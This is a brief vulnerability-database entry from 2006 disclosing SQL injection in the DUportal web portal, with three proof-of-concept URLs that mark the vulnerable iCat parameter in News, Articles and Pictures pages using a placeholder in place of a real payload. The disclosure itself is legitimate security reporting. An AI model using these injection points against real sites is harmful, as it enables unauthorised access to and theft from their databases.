Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12446
HistoryApr 27, 2006 - 12:00 a.m.

SQL Injection On DUportal

2006-04-2700:00:00
vulners.com
34

Proof of Concept:
/News/cat.asp?iCat=' [SQL INJECTION]&iChannel=1&nChannel=News
/Articles/cat.asp?iCat=' [SQL INJECTION]&iChannel=2&nChannel=Articles
/Pictures/cat.asp?iCat=' [SQL INJECTION]&iChannel=3&nChannel=Pictures

Original advisory:http://www.aria-security.net/advisory/duportal.txt